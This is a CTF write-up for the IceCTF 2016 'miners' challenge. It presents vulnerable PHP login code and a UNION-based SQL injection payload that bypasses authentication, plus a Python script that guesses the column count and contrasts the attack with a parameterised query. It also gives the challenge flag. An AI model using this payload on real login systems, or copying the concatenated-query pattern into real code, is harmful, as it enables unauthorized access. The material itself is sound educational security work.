Information#
Version#
| By | Version | Comment |
|---|---|---|
| noraj | 1.0 | Creation |
CTF#
- Name : IceCTF 2016
- Website : https://icec.tf/
- Type : Online
- Format : Jeopardy
- CTF Time : link
Description#
The miners website has been working on adding a login portal so that all miners can get the flag, but they haven't made any accounts! However, your boss demands the flag now! Can you get in anyway? miners.vuln.icec.tf
Solution#
- Notice that the `users` table is empty: there is no account whose credentials we could guess.
- We have the source code of the login page:
```php
<?php
include "config.php";   // not shown; assumed to define the $MYSQL_* credentials and $FLAG
$con = mysqli_connect($MYSQL_HOST, $MYSQL_USER, $MYSQL_PASS, $MYSQL_DB);
$username = $_POST["username"];
$password = $_POST["password"];
// Vulnerable: user input is concatenated straight into the SQL string
$query = "SELECT * FROM users WHERE username='$username' AND password='$password'";
$result = mysqli_query($con, $query);
if (mysqli_num_rows($result) !== 1) {
    echo "<h1>Login failed.</h1>";
} else {
    echo "<h1>Logged in!</h1>";
    echo "<p>Your flag is: $FLAG</p>";
}
?>
```

- Even if the table is empty, all we need is for the query to return exactly one row, because the only check is `mysqli_num_rows($result) !== 1`.
- To do that we `UNION` the original (empty) result with a non-empty `SELECT`. A `UNION` is only valid when both sides have the same number of columns, so we have to guess the number of columns of `users`: with the wrong count MySQL rejects the query, `mysqli_query()` returns `false` and we get "Login failed."; with the right count the `SELECT 1,2,3` row comes back and we are logged in. The trailing `#` is a MySQL line comment that discards the rest of the original query (`' AND password='...'`).
- Username: `' UNION SELECT 1,2,3 #` and Password: `random`.
- The query executed is `SELECT * FROM users WHERE username='' UNION SELECT 1,2,3 #' AND password='random'`, which returns the single row `1,2,3`.
- Flag: `IceCTF{the_miners_union_is_a_strong_one}`.

Note: the database is MySQL (the `#` line-comment syntax used in the payload is MySQL-specific).
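The column-guessing step above, as an added example that is not part of the original writeup: a Python script that reproduces the challenge's concatenated query against an in-memory SQLite stand-in for the empty `users` table (assumed here to have three columns: `id`, `username`, `password`), walks the `UNION` payload up from one column until the query stops erroring, and shows the parameterised query that defeats the same payload. SQLite has no `#` comment, so the payload uses its `-- ` line comment instead of the MySQL `#` from the writeup; everything else is the same technique.

```python
import sqlite3


def make_db():
    """Constructed stand-in for the challenge DB: an empty 3-column users table."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    return con


def vulnerable_login(con, username, password):
    """Mirrors the challenge PHP: string-built query, success iff exactly one row."""
    query = f"SELECT * FROM users WHERE username='{username}' AND password='{password}'"
    try:
        rows = con.execute(query).fetchall()
    except sqlite3.Error:
        # A UNION with the wrong column count is a syntax-level error. In the PHP,
        # mysqli_query() returns false in that case and the page prints "Login failed.",
        # which is exactly the signal used to tell a wrong guess from a right one.
        return False
    return len(rows) == 1


def safe_login(con, username, password):
    """Hardened version: bound parameters, so input never becomes SQL syntax."""
    rows = con.execute(
        "SELECT * FROM users WHERE username=? AND password=?", (username, password)
    ).fetchall()
    return len(rows) == 1


def guess_column_count(con, max_cols=10):
    """Raise the number of UNION columns until the login succeeds.

    Returns (column_count, payload) or (None, None) if nothing worked.
    The writeup's payload is `' UNION SELECT 1,2,3 #`; here `-- ` replaces `#`
    because that is SQLite's line comment.
    """
    for n in range(1, max_cols + 1):
        columns = ",".join(str(i) for i in range(1, n + 1))
        payload = f"' UNION SELECT {columns} -- "
        if vulnerable_login(con, payload, "random"):
            return n, payload
    return None, None


if __name__ == "__main__":
    db = make_db()
    n, payload = guess_column_count(db)
    print(f"users has {n} columns; working username payload: {payload!r}")
    print("parameterised login with the same payload:", safe_login(db, payload, "random"))
```

The first two guesses (`SELECT 1` and `SELECT 1,2`) fail with a column-count error and so read as "Login failed."; the third returns the single synthetic row and logs in, which is why the writeup's payload has three values. The parameterised query returns zero rows for the same input because the quote, `UNION` and comment are all treated as literal characters of a username.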